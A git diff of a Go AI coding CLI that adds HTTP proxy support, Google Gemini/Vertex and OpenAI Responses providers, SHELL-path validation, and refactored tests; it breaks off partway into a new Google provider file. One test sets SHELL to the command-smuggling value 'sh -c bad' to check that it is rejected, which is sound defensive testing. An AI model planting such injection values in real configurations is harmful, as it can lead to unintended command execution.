diff --git a/internal/platform/platform.go b/internal/platform/platform.go
index 273aceb..12e4202 100644
--- a/internal/platform/platform.go
+++ b/internal/platform/platform.go
@@ -31,8 +31,14 @@ func IsLinux() bool {
 
 // HomeDir returns the user's home directory.
 func HomeDir() string {
-	home, _ := os.UserHomeDir()
-	return home
+	home, err := os.UserHomeDir()
+	if err == nil && home != "" {
+		return home
+	}
+	if cwd, err := os.Getwd(); err == nil && cwd != "" {
+		return cwd
+	}
+	return string(os.PathSeparator)
 }
 
 // ConfigDir returns the platform-specific configuration directory.
@@ -41,17 +47,18 @@ func ConfigDir() string {
 		return dir
 	}
 
-	switch runtime.GOOS {
+	return configDirForOS(runtime.GOOS, HomeDir(), os.Getenv("APPDATA"))
+}
+
+func configDirForOS(goos, home, appData string) string {
+	switch goos {
 	case "windows":
-		appData := os.Getenv("APPDATA")
 		if appData != "" {
 			return filepath.Join(appData, "vibecoding")
 		}
-		return filepath.Join(HomeDir(), "AppData", "Roaming", "vibecoding")
-	case "darwin":
-		return filepath.Join(HomeDir(), "Library", "Application Support", "vibecoding")
+		return filepath.Join(home, "AppData", "Roaming", "vibecoding")
 	default: // linux and others
-		return filepath.Join(HomeDir(), ".vibecoding")
+		return filepath.Join(home, ".vibecoding")
 	}
 }
 
@@ -92,7 +99,7 @@ func SkillsDir() string {
 
 // DefaultShell returns the default shell for the current platform.
 func DefaultShell() string {
-	if shell := os.Getenv("SHELL"); shell != "" {
+	if shell := os.Getenv("SHELL"); isExecutableAbsolutePath(shell) {
 		return shell
 	}
 
@@ -110,6 +117,17 @@ func DefaultShell() string {
 	}
 }
 
+func isExecutableAbsolutePath(path string) bool {
+	if path == "" || !filepath.IsAbs(path) {
+		return false
+	}
+	info, err := os.Stat(path)
+	if err != nil || info.IsDir() {
+		return false
+	}
+	return info.Mode()&0111 != 0
+}
+
 // ShellArgs returns the arguments to execute a command in the shell.
 func ShellArgs(shell, command string) []string {
 	normalizedShell := strings.ToLower(shell)
diff --git a/internal/platform/platform_test.go b/internal/platform/platform_test.go
index 402b84d..1f2ed4a 100644
--- a/internal/platform/platform_test.go
+++ b/internal/platform/platform_test.go
@@ -72,6 +72,48 @@ func TestConfigDir(t *testing.T) {
 	}
 }
 
+func TestConfigDirForOS(t *testing.T) {
+	home := filepath.Join(string(os.PathSeparator), "home", "tester")
+	appData := filepath.Join(string(os.PathSeparator), "Users", "tester", "AppData", "Roaming")
+
+	tests := []struct {
+		name    string
+		goos    string
+		appData string
+		want    string
+	}{
+		{
+			name: "darwin defaults to home dot directory",
+			goos: "darwin",
+			want: filepath.Join(home, ".vibecoding"),
+		},
+		{
+			name: "linux defaults to home dot directory",
+			goos: "linux",
+			want: filepath.Join(home, ".vibecoding"),
+		},
+		{
+			name:    "windows uses appdata when available",
+			goos:    "windows",
+			appData: appData,
+			want:    filepath.Join(appData, "vibecoding"),
+		},
+		{
+			name: "windows falls back to roaming appdata",
+			goos: "windows",
+			want: filepath.Join(home, "AppData", "Roaming", "vibecoding"),
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := configDirForOS(tt.goos, home, tt.appData); got != tt.want {
+				t.Fatalf("configDirForOS() = %q, want %q", got, tt.want)
+			}
+		})
+	}
+}
+
 func TestDataDir(t *testing.T) {
 	dir := DataDir()
 	if dir == "" {
@@ -124,6 +166,14 @@ func TestDefaultShell(t *testing.T) {
 	}
 }
 
+func TestDefaultShellIgnoresRelativeShellEnv(t *testing.T) {
+	t.Setenv("SHELL", "sh -c bad")
+
+	if got := DefaultShell(); got == "sh -c bad" {
+		t.Fatal("DefaultShell trusted relative SHELL env")
+	}
+}
+
 func TestShellArgs(t *testing.T) {
 	tests := []struct {
 		shell    string
diff --git a/internal/provider/anthropic/provider.go b/internal/provider/anthropic/provider.go
index e7debfb..fc73bed 100644
--- a/internal/provider/anthropic/provider.go
+++ b/internal/provider/anthropic/provider.go
@@ -63,6 +63,22 @@ func NewProvider(apiKey, baseURL string) *Provider {
 
 // NewProviderWithModels creates a new Anthropic provider with custom models.
 func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Provider {
+	p, err := NewProviderWithModelsAndProxy(apiKey, baseURL, "", models)
+	if err != nil {
+		return newProviderWithHTTPClient(apiKey, baseURL, models, &http.Client{Timeout: 30 * time.Minute})
+	}
+	return p
+}
+
+func NewProviderWithModelsAndProxy(apiKey, baseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	client, err := provider.NewHTTPClient(30*time.Minute, proxyURL)
+	if err != nil {
+		return nil, fmt.Errorf("configure http proxy: %w", err)
+	}
+	return newProviderWithHTTPClient(apiKey, baseURL, models, client), nil
+}
+
+func newProviderWithHTTPClient(apiKey, baseURL string, models []*provider.Model, client *http.Client) *Provider {
 	if baseURL == "" {
 		baseURL = "https://api.anthropic.com"
 	}
@@ -73,7 +89,7 @@ func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Pr
 		BaseProvider: provider.NewBaseProvider("anthropic", models),
 		apiKey:       apiKey,
 		baseURL:      strings.TrimRight(baseURL, "/"),
-		client:       &http.Client{Timeout: 30 * time.Minute},
+		client:       client,
 	}
 }
 
@@ -111,6 +127,8 @@ type anthropicRequest struct {
 	System       interface{}            `json:"system,omitempty"` // string or []anthropicContentBlock for cache_control
 	Tools        []anthropicTool        `json:"tools,omitempty"`
 	MaxTokens    int                    `json:"max_tokens"`
+	Temperature  *float64               `json:"temperature,omitempty"`
+	TopP         *float64               `json:"top_p,omitempty"`
 	Stream       bool                   `json:"stream"`
 	Thinking     *anthropicThinking     `json:"thinking,omitempty"`
 	OutputConfig *anthropicOutputConfig `json:"output_config,omitempty"`
@@ -157,9 +175,10 @@ type anthropicImage struct {
 }
 
 type anthropicTool struct {
-	Name        string          `json:"name"`
-	Description string          `json:"description"`
-	InputSchema json.RawMessage `json:"input_schema"`
+	Type        string          `json:"type,omitempty"`
+	Name        string          `json:"name,omitempty"`
+	Description string          `json:"description,omitempty"`
+	InputSchema json.RawMessage `json:"input_schema,omitempty"`
 }
 
 type anthropicResponse struct {
@@ -232,11 +251,13 @@ func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan
 		}
 
 		reqBody := anthropicRequest{
-			Model:     modelID,
-			Messages:  p.convertMessages(params),
-			Tools:     p.convertTools(params.Tools),
-			MaxTokens: maxTokens,
-			Stream:    true,
+			Model:       modelID,
+			Messages:    p.convertMessages(params),
+			Tools:       p.convertTools(params.Tools),
+			MaxTokens:   maxTokens,
+			Temperature: params.Temperature,
+			TopP:        params.TopP,
+			Stream:      true,
 		}
 		if params.SystemPrompt != "" {
 			if p.IsCacheControlEnabled() {
@@ -622,6 +643,14 @@ func (p *Provider) convertToolResultMessage(msg provider.Message, cacheEnabled b
 func (p *Provider) convertTools(tools []provider.ToolDefinition) []anthropicTool {
 	var result []anthropicTool
 	for _, t := range tools {
+		if t.Kind == "hosted" {
+			toolType := provider.HostedWebSearchToolType(t.ProviderType, t.Name)
+			if toolType == "" {
+				continue
+			}
+			result = append(result, anthropicTool{Type: toolType})
+			continue
+		}
 		result = append(result, anthropicTool{Name: t.Name, Description: t.Description, InputSchema: t.Parameters})
 	}
 	return result
diff --git a/internal/provider/anthropic/provider_test.go b/internal/provider/anthropic/provider_test.go
index 9e0fc47..c87fd6e 100644
--- a/internal/provider/anthropic/provider_test.go
+++ b/internal/provider/anthropic/provider_test.go
@@ -1,13 +1,12 @@
 package anthropic
 
 import (
+	"bytes"
 	"context"
 	"encoding/json"
-	"fmt"
 	"io"
 	"net/http"
-	"net/http/httptest"
-	"strings"
+	"net/url"
 	"testing"
 
 	"github.com/startvibecoding/vibecoding/internal/provider"
@@ -15,37 +14,61 @@ import (
 
 // ─── helpers ─────────────────────────────────────────────────────────────────
 
-func newTestServer(t *testing.T, sse string) *httptest.Server {
+func chatAndCollect(t *testing.T, p *Provider, params provider.ChatParams) []provider.StreamEvent {
 	t.Helper()
-	defer func() {
-		if r := recover(); r != nil {
-			if strings.Contains(fmt.Sprint(r), "httptest: failed to listen on a port") {
-				t.Skipf("local httptest listener unavailable: %v", r)
+	var events []provider.StreamEvent
+	for e := range p.Chat(context.Background(), params) {
+		events = append(events, e)
+	}
+	return events
+}
+
+type roundTripFunc func(*http.Request) (*http.Response, error)
+
+func (f roundTripFunc) RoundTrip(r *http.Request) (*http.Response, error) {
+	return f(r)
+}
+
+func newMockAnthropicProvider(t *testing.T, models []*provider.Model, sse string, bodyCh chan<- string, check func(*http.Request)) *Provider {
+	t.Helper()
+	p := NewProviderWithModels("fake-key", "https://api.anthropic.com", models)
+	p.client = &http.Client{Transport: roundTripFunc(func(r *http.Request) (*http.Response, error) {
+		if check != nil {
+			check(r)
+		}
+		if bodyCh != nil {
+			body, err := io.ReadAll(r.Body)
+			if err != nil {
+				return nil, err
 			}
-			panic(r)
+			bodyCh <- string(body)
 		}
-	}()
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte(sse))
-	}))
-	t.Cleanup(srv.Close)
-	return srv
+		return &http.Response{
+			StatusCode: http.StatusOK,
+			Header:     make(http.Header),
+			Body:       io.NopCloser(bytes.NewBufferString(sse)),
+			Request:    r,
+		}, nil
+	})}
+	return p
 }
 
-func chatAndCollect(t *testing.T, srv *httptest.Server) []provider.StreamEvent {
-	t.Helper()
-	p := NewProvider("fake-key", srv.URL)
-	params := provider.ChatParams{
-		Messages: []provider.Message{provider.NewUserMessage("hi")},
-		Abort:    make(chan struct{}),
+func TestAnthropicProviderHTTPProxy(t *testing.T) {
+	p, err := NewProviderWithModelsAndProxy("fake-key", "https://api.anthropic.com", "http://127.0.0.1:7890", []*provider.Model{{ID: "m1"}})
+	if err != nil {
+		t.Fatalf("provider with proxy: %v", err)
 	}
-	var events []provider.StreamEvent
-	for e := range p.Chat(context.Background(), params) {
-		events = append(events, e)
+	transport, ok := p.client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", p.client.Transport)
+	}
+	proxyURL, err := transport.Proxy(&http.Request{URL: &url.URL{Scheme: "https", Host: "api.anthropic.com"}})
+	if err != nil {
+		t.Fatalf("proxy lookup: %v", err)
+	}
+	if proxyURL == nil || proxyURL.String() != "http://127.0.0.1:7890" {
+		t.Fatalf("proxy = %v, want http://127.0.0.1:7890", proxyURL)
 	}
-	return events
 }
 
 func mustUsage(t *testing.T, events []provider.StreamEvent) *provider.Usage {
@@ -123,20 +146,7 @@ func TestConvertMessagesOmitsCacheControlWhenDisabled(t *testing.T) {
 
 func TestChatRequestPreservesCacheControlOnSingleTextBlock(t *testing.T) {
 	bodyCh := make(chan string, 1)
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		body, err := io.ReadAll(r.Body)
-		if err != nil {
-			http.Error(w, err.Error(), http.StatusInternalServerError)
-			return
-		}
-		bodyCh <- string(body)
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte("data: {\"type\":\"message_stop\"}\n"))
-	}))
-	t.Cleanup(srv.Close)
-
-	p := NewProvider("fake-key", srv.URL)
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "claude-test"}}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
 	p.SetCacheControlEnabled(boolPtr(true))
 	params := provider.ChatParams{
 		ModelID: "claude-test",
@@ -186,6 +196,42 @@ func TestChatRequestPreservesCacheControlOnSingleTextBlock(t *testing.T) {
 	}
 }
 
+func TestChatRequestHostedWebSearchTool(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "claude-test"}}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
+	params := provider.ChatParams{
+		ModelID: "claude-test",
+		Messages: []provider.Message{
+			provider.NewUserMessage("search the web"),
+		},
+		Tools: []provider.ToolDefinition{
+			{Name: "web_search", Kind: "hosted", Provider: "anthropic", ProviderType: "messages"},
+		},
+		Abort: make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req anthropicRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if len(req.Tools) != 1 {
+		t.Fatalf("len(tools) = %d, want 1", len(req.Tools))
+	}
+	if req.Tools[0].Type != "web_search_20250305" {
+		t.Fatalf("tool.type = %q, want web_search_20250305", req.Tools[0].Type)
+	}
+	if req.Tools[0].Name != "" {
+		t.Fatalf("hosted tool should not include name: %#v", req.Tools[0])
+	}
+}
+
 func TestConvertMessagesAnthropicToolResultEmptyContentFallback(t *testing.T) {
 	p := NewProvider("fake-key", "https://api.anthropic.com")
 	msgs := p.convertMessages(provider.ChatParams{
@@ -257,22 +303,9 @@ func TestConvertMessagesAnthropicGroupsConsecutiveToolResults(t *testing.T) {
 
 func TestAnthropicThinkingFormatDeepSeek(t *testing.T) {
 	bodyCh := make(chan string, 1)
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		body, err := io.ReadAll(r.Body)
-		if err != nil {
-			http.Error(w, err.Error(), http.StatusInternalServerError)
-			return
-		}
-		bodyCh <- string(body)
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte("data: {\"type\":\"message_stop\"}\n"))
-	}))
-	t.Cleanup(srv.Close)
-
-	p := NewProviderWithModels("fake-key", srv.URL, []*provider.Model{
+	p := newMockAnthropicProvider(t, []*provider.Model{
 		{ID: "deepseek-test", Reasoning: true},
-	})
+	}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
 	p.SetThinkingFormat("deepseek")
 	params := provider.ChatParams{
 		ModelID:       "deepseek-test",
@@ -303,22 +336,9 @@ func TestAnthropicThinkingFormatDeepSeek(t *testing.T) {
 
 func TestAnthropicThinkingOmittedForNonReasoningModel(t *testing.T) {
 	bodyCh := make(chan string, 1)
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		body, err := io.ReadAll(r.Body)
-		if err != nil {
-			http.Error(w, err.Error(), http.StatusInternalServerError)
-			return
-		}
-		bodyCh <- string(body)
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte("data: {\"type\":\"message_stop\"}\n"))
-	}))
-	t.Cleanup(srv.Close)
-
-	p := NewProviderWithModels("fake-key", srv.URL, []*provider.Model{
+	p := newMockAnthropicProvider(t, []*provider.Model{
 		{ID: "claude-opus-test", Reasoning: false},
-	})
+	}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
 	params := provider.ChatParams{
 		ModelID:       "claude-opus-test",
 		Messages:      []provider.Message{provider.NewUserMessage("hi")},
@@ -348,22 +368,9 @@ func TestAnthropicThinkingOmittedForNonReasoningModel(t *testing.T) {
 
 func TestAnthropicThinkingAdaptiveForOpus47(t *testing.T) {
 	bodyCh := make(chan string, 1)
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		body, err := io.ReadAll(r.Body)
-		if err != nil {
-			http.Error(w, err.Error(), http.StatusInternalServerError)
-			return
-		}
-		bodyCh <- string(body)
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte("data: {\"type\":\"message_stop\"}\n"))
-	}))
-	t.Cleanup(srv.Close)
-
-	p := NewProviderWithModels("fake-key", srv.URL, []*provider.Model{
+	p := newMockAnthropicProvider(t, []*provider.Model{
 		{ID: "claude-opus-4-7", Reasoning: true},
-	})
+	}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
 	params := provider.ChatParams{
 		ModelID:       "claude-opus-4-7",
 		Messages:      []provider.Message{provider.NewUserMessage("hi")},
@@ -393,22 +400,9 @@ func TestAnthropicThinkingAdaptiveForOpus47(t *testing.T) {
 
 func TestAnthropicThinkingAdaptiveFromModelCompat(t *testing.T) {
 	bodyCh := make(chan string, 1)
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		body, err := io.ReadAll(r.Body)
-		if err != nil {
-			http.Error(w, err.Error(), http.StatusInternalServerError)
-			return
-		}
-		bodyCh <- string(body)
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte("data: {\"type\":\"message_stop\"}\n"))
-	}))
-	t.Cleanup(srv.Close)
-
-	p := NewProviderWithModels("fake-key", srv.URL, []*provider.Model{
+	p := newMockAnthropicProvider(t, []*provider.Model{
 		{ID: "custom-adaptive", Reasoning: true, Compat: &provider.ModelCompat{ForceAdaptiveThinking: true}},
-	})
+	}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
 	params := provider.ChatParams{
 		ModelID:       "custom-adaptive",
 		Messages:      []provider.Message{provider.NewUserMessage("hi")},
@@ -445,8 +439,8 @@ func TestAnthropicCache_FirstTurn(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"output_tokens\":10}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 1000 {
 		t.Errorf("Input = %d, want 1000", u.Input)
@@ -478,8 +472,8 @@ func TestAnthropicCache_CachedTurn(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"output_tokens\":15}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 1000 {
 		t.Errorf("Input = %d, want 1000", u.Input)
@@ -510,8 +504,8 @@ func TestAnthropicCache_NoCache(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"output_tokens\":5}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 200 {
 		t.Errorf("Input = %d, want 200", u.Input)
@@ -541,8 +535,8 @@ func TestAnthropicCache_ProxyAllUsageInMessageDelta(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"input_tokens\":800,\"output_tokens\":20,\"cache_read_input_tokens\":600,\"cache_creation_input_tokens\":0}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 800 {
 		t.Errorf("Input = %d, want 800", u.Input)
@@ -569,8 +563,8 @@ func TestAnthropicCache_ProxySplitUsage(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"output_tokens\":8}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 500 {
 		t.Errorf("Input = %d, want 500", u.Input)
@@ -599,8 +593,8 @@ func TestAnthropicCache_FirstWinsOnConflict(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"input_tokens\":999,\"output_tokens\":12,\"cache_read_input_tokens\":800}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	// message_start values win
 	if u.Input != 1000 {
diff --git a/internal/provider/factory/factory.go b/internal/provider/factory/factory.go
index 6ade36b..f004a69 100644
--- a/internal/provider/factory/factory.go
+++ b/internal/provider/factory/factory.go
@@ -7,6 +7,7 @@ import (
 	"github.com/startvibecoding/vibecoding/internal/config"
 	"github.com/startvibecoding/vibecoding/internal/provider"
 	"github.com/startvibecoding/vibecoding/internal/provider/anthropic"
+	"github.com/startvibecoding/vibecoding/internal/provider/google"
 	"github.com/startvibecoding/vibecoding/internal/provider/openai"
 )
 
@@ -38,7 +39,10 @@ func CreateWithOptions(settings *config.Settings, providerName, modelID string,
 		var p provider.Provider
 		switch resolved.API {
 		case "anthropic-messages":
-			ap := anthropic.NewProviderWithModels(apiKey, resolved.BaseURL, models)
+			ap, err := anthropic.NewProviderWithModelsAndProxy(apiKey, resolved.BaseURL, pc.HTTPProxy, models)
+			if err != nil {
+				return nil, nil, err
+			}
 			if resolved.ThinkingFormat != "" {
 				ap.SetThinkingFormat(resolved.ThinkingFormat)
 			}
@@ -47,15 +51,36 @@ func CreateWithOptions(settings *config.Settings, providerName, modelID string,
 			}
 			ConfigureRetry(ap, settings)
 			p = ap
-		case "openai-chat", "openai":
-			op := openai.NewProviderWithModels(apiKey, resolved.BaseURL, models)
+		case "openai-chat", "openai", "openai-responses", "responses":
+			op, err := openai.NewProviderWithModelsAndProxy(apiKey, resolved.BaseURL, pc.HTTPProxy, models)
+			if err != nil {
+				return nil, nil, err
+			}
 			if resolved.ThinkingFormat != "" {
 				op.SetThinkingFormat(resolved.ThinkingFormat)
 			}
+			if resolved.API == "openai-responses" || resolved.API == "responses" {
+				op.SetUseResponsesAPI(true)
+				op.SetResponsesConfig(pc.Responses)
+			}
 			ConfigureRetry(op, settings)
 			p = op
+		case "google-gemini":
+			gp, err := google.NewGeminiProviderWithModelsAndProxy(apiKey, resolved.BaseURL, pc.HTTPProxy, models)
+			if err != nil {
+				return nil, nil, err
+			}
+			ConfigureRetry(gp, settings)
+			p = gp
+		case "google-vertex":
+			gp, err := google.NewVertexProviderWithModelsAndProxy(apiKey, resolved.BaseURL, pc.HTTPProxy, models)
+			if err != nil {
+				return nil, nil, err
+			}
+			ConfigureRetry(gp, settings)
+			p = gp
 		default:
-			return nil, nil, fmt.Errorf("unsupported API type: %s (use 'openai-chat' or 'anthropic-messages')", resolved.API)
+			return nil, nil, fmt.Errorf("unsupported API type: %s (use 'openai-chat', 'openai-responses', 'anthropic-messages', 'google-gemini', or 'google-vertex')", resolved.API)
 		}
 
 		model := p.GetModel(modelID)
@@ -79,6 +104,10 @@ func CreateWithOptions(settings *config.Settings, providerName, modelID string,
 			ap.SetCacheControlEnabled(opts.BuiltinAnthropicCacheControl)
 		}
 		p = ap
+	case "google-gemini":
+		p = google.NewGeminiProvider(settings.ResolveKey(providerName), "")
+	case "google-vertex":
+		p = google.NewVertexProvider(settings.ResolveKey(providerName), "")
 	default:
 		return nil, nil, fmt.Errorf("unknown provider: %s (add it to settings.json providers section)", providerName)
 	}
@@ -137,6 +166,8 @@ func ConvertModelConfigs(providerName string, models []config.ModelConfig) []*pr
 			Cost:          cost,
 			ContextWindow: m.ContextWindow,
 			MaxTokens:     m.MaxTokens,
+			Temperature:   m.Temperature,
+			TopP:          m.TopP,
 			Compat:        convertCompat(m.Compat),
 		})
 	}
@@ -158,6 +189,8 @@ func convertCompat(c *config.ModelCompat) *provider.ModelCompat {
 		MaxTokensField:                      c.MaxTokensField,
 		SupportsCacheControlOnTools:         cloneBoolPtr(c.SupportsCacheControlOnTools),
 		SupportsLongCacheRetention:          cloneBoolPtr(c.SupportsLongCacheRetention),
+		SupportsPromptCacheKey:              cloneBoolPtr(c.SupportsPromptCacheKey),
+		SupportsReasoningSummary:            cloneBoolPtr(c.SupportsReasoningSummary),
 		SendSessionAffinityHeaders:          c.SendSessionAffinityHeaders,
 		SupportsEagerToolInputStreaming:     cloneBoolPtr(c.SupportsEagerToolInputStreaming),
 	}
diff --git a/internal/provider/factory/factory_test.go b/internal/provider/factory/factory_test.go
index 8a17c89..014e4a8 100644
--- a/internal/provider/factory/factory_test.go
+++ b/internal/provider/factory/factory_test.go
@@ -66,6 +66,109 @@ func TestConvertModelConfigsPreservesCompat(t *testing.T) {
 	}
 }
 
+func TestCreateOpenAIResponsesProvider(t *testing.T) {
+	settings := &config.Settings{
+		Providers: map[string]*config.ProviderConfig{
+			"openai-responses-test": {
+				APIKey:  "fake-key",
+				BaseURL: "https://api.openai.com/v1",
+				API:     "openai-responses",
+				Responses: config.ResponsesConfig{
+					ReasoningSummary:     "concise",
+					PromptCacheKey:       "custom-cache-key",
+					PromptCacheRetention: "24h",
+				},
+				Models: []config.ModelConfig{
+					{ID: "gpt-test", Name: "GPT Test"},
+				},
+			},
+		},
+	}
+
+	p, model, err := Create(settings, "openai-responses-test", "gpt-test")
+	if err != nil {
+		t.Fatalf("create provider: %v", err)
+	}
+	if p == nil {
+		t.Fatal("provider is nil")
+	}
+	if model == nil || model.ID != "gpt-test" {
+		t.Fatalf("model = %#v, want gpt-test", model)
+	}
+}
+
+func TestCreateGoogleGeminiProvider(t *testing.T) {
+	settings := &config.Settings{
+		Providers: map[string]*config.ProviderConfig{
+			"gemini-test": {
+				APIKey:  "fake-key",
+				BaseURL: "https://generativelanguage.googleapis.com/v1beta/models",
+				API:     "google-gemini",
+				Models: []config.ModelConfig{
+					{ID: "gemini-test", Name: "Gemini Test", Reasoning: true},
+				},
+			},
+		},
+	}
+
+	p, model, err := Create(settings, "gemini-test", "gemini-test")
+	if err != nil {
+		t.Fatalf("create provider: %v", err)
+	}
+	if p.Name() != "google-gemini" {
+		t.Fatalf("provider name = %q, want google-gemini", p.Name())
+	}
+	if model == nil || model.ID != "gemini-test" {
+		t.Fatalf("model = %#v, want gemini-test", model)
+	}
+}
+
+func TestCreateGoogleVertexProvider(t *testing.T) {
+	settings := &config.Settings{
+		Providers: map[string]*config.ProviderConfig{
+			"vertex-test": {
+				APIKey:  "fake-token",
+				BaseURL: "https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models",
+				API:     "google-vertex",
+				Models: []config.ModelConfig{
+					{ID: "gemini-test", Name: "Gemini Test", Reasoning: true},
+				},
+			},
+		},
+	}
+
+	p, model, err := Create(settings, "vertex-test", "gemini-test")
+	if err != nil {
+		t.Fatalf("create provider: %v", err)
+	}
+	if p.Name() != "google-vertex" {
+		t.Fatalf("provider name = %q, want google-vertex", p.Name())
+	}
+	if model == nil || model.ID != "gemini-test" {
+		t.Fatalf("model = %#v, want gemini-test", model)
+	}
+}
+
+func TestCreateProviderRejectsInvalidHTTPProxy(t *testing.T) {
+	settings := &config.Settings{
+		Providers: map[string]*config.ProviderConfig{
+			"bad-proxy": {
+				APIKey:    "fake-key",
+				BaseURL:   "https://api.openai.com/v1",
+				API:       "openai-chat",
+				HTTPProxy: "http://[::1",
+				Models: []config.ModelConfig{
+					{ID: "gpt-test", Name: "GPT Test"},
+				},
+			},
+		},
+	}
+
+	if _, _, err := Create(settings, "bad-proxy", "gpt-test"); err == nil {
+		t.Fatal("expected invalid http proxy error")
+	}
+}
+
 func TestConvertModelConfigsSupportsReferenceReasoningAlias(t *testing.T) {
 	models := ConvertModelConfigs("test", []config.ModelConfig{
 		{
diff --git a/internal/provider/google/provider.go b/internal/provider/google/provider.go
new file mode 100644
index 0000000..af0e4f0
--- /dev/null
+++ b/internal/provider/google/provider.go
@@ -0,0 +1,533 @@
+package google
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/ua"
+)
+
+type APIKind string
+
+const (
+	APIKindGemini APIKind = "gemini"
+	APIKindVertex APIKind = "vertex"
+)
+
+type Provider struct {
+	provider.BaseProvider
+	apiKey        string
+	baseURL       string
+	apiKind       APIKind
+	client        *http.Client
+	retryConfig   *provider.RetryConfig
+	cachedContent string
+}
+
+func DefaultModels(providerName string) []*provider.Model {
+	return []*provider.Model{
+		{
+			ID: "gemini-2.5-pro", Name: "Gemini 2.5 Pro", Provider: providerName, Reasoning: true,
